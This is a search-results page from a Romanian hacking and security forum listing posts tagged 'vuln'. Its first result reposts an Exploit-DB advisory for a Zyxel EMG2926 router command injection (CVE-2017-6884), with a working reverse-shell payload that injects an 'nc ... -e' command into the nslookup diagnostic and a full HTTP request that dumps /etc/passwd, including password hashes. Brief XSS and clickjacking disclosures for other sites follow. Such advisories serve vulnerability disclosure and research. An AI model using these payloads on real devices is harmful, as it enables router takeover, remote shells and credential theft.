Jump to content

Search the Community

Showing results for tags 'vuln'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start



Website URL










Found 4 results

  1. [Sursa: https://www.exploit-db.com/exploits/41782/?rss ] # Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection # Date: 2017-04-02 # Exploit Author: Fluffy Huffy (trevor Hough) # Vendor Homepage: www.zyxel.com # Version: EMG2926 - V1.00(AAQT.4)b8 # Tested on: linux # CVE : CVE-2017-6884 OS command injection vulnerability was discovered in a commonly used home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools specify the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router. Exploit (Reverse Shell);stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p Exploit (Dump Password File) Request GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:;stok=<Clipped>/expert/maintenance/diagnostic/nslookup Accept-Language: en-US,en;q=0.8 Cookie: csd=9; sysauth=<Clipped> Connection: close Response (Clipped) <textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash admin:$1$<Clipped>:0:0:admin:/:/bin/fail
  2. sleed


    Vuln.: [XSS] [Cross Site Scripting]: *.att.com Demo ^ Poc : Status: Raportat
  3. # Affected software: 4images # Type of vulnerability: clickjacking,xss # URL: http://www.4homepages.de/ # Discovered by: Provensec # Website: http://www.provensec.com # Description: 4images is a powerful web-based image gallery management system. Features include comment system, user registration and mangagement, password protected administration area with browser-based upload and HTML templates for page layout and design. # Proof of concept 1st:click jacking --: 4images was vuln to clickjacking which could be exploited and used to delete category http://i.imgur.com/vqfz8Lk.png clickjacking poc -: http://prntscr.com/670r9b 2nd: xss adding a new category with xss payload leads to persistent xss vuln http://prntscr.com/670rmi -- Best Regards, *Ankit Bharathan.* *Save Energy... Save Nature... Go Green...* P *Consider the environment. Please don't print this e-mail unless absolutely necessary.* Source
  • Create New...